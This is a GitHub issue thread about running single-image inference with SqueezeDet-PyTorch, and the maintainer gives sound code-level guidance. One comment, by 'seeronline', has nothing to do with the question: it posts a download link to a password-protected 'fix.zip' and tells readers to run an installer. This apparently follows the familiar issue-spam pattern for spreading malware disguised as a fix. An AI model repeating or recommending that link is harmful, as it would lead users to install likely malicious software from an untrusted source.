### ISSUE TITLE
How to predict just 1 image?

### ISSUE THREAD

**Issue by peacemo** [QiuJueqin/SqueezeDet-PyTorch#15]
Hello, I’m working with this model and noticed that the model requires loading the entire dataset due to hardcoded num_class and num_anchors values in the dataloader. Is there a way to adapt the code to allow prediction on a single image or frame without needing the dataloader? Any guidance on how to approach this would be appreciated.

**Comment by seeronline** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by QiuJueqin** [comment]
@peacemo You can modify following part in [demo.py](https://github.com/QiuJueqin/SqueezeDet-PyTorch/blob/master/src/demo.py) 

https://github.com/QiuJueqin/SqueezeDet-PyTorch/blob/b0d80daa0147c968d43f3c38bc416394419c4bcc/src/demo.py#L35-L40

by explicitly specifying your image path and removing for loop, to something like

```
image_path = 'path-to-your-image.jpg'
image = skimage.io.imread(image_path ).astype(np.float32)
```

**Comment by peacemo** [comment]
> @peacemo You can modify following part in [demo.py](https://github.com/QiuJueqin/SqueezeDet-PyTorch/blob/master/src/demo.py)
> 
> https://github.com/QiuJueqin/SqueezeDet-PyTorch/blob/b0d80daa0147c968d43f3c38bc416394419c4bcc/src/demo.py#L35-L40
> 
> by explicitly specifying your image path and removing for loop, to something like
> 
> ```
> image_path = 'path-to-your-image.jpg'
> image = skimage.io.imread(image_path ).astype(np.float32)
> ```

I'm very appreciated for your reply. This works for custom images, but the model should be loaded before reading these images in a for loop like this:

https://github.com/QiuJueqin/SqueezeDet-PyTorch/blob/b0d80daa0147c968d43f3c38bc416394419c4bcc/src/demo.py#L30-L32

According to the code. While loading the model, a full dataset is needed to calculate the `num_classes` and `num_anchors`  for creating the `SquezzeDetBase` model. And then for the predicting. 

What if I wanna transfer the model weights to other devices like another computer. Should I take the 'pth' file **AS WELL AS** the dataset to ensure the loading process? 

Thanks again!!!!

**Comment by QiuJueqin** [comment]
> Should I take the 'pth' file AS WELL AS the dataset to ensure the loading process?

No. 

You need to slightly modify interface to function

https://github.com/QiuJueqin/SqueezeDet-PyTorch/blob/b0d80daa0147c968d43f3c38bc416394419c4bcc/src/demo.py#L23

by recording and passing attributes from your **training dataset** into this function instead of passing a dataset instance as an argument. 

It will look like

```python
cfg = Config().update_dataset_info(cfg, img_size, rgb_mean, rgb_std, class_names, num_classes, ...)
```

**Comment by peacemo** [comment]
@QiuJueqin Thanks a lot! This works.
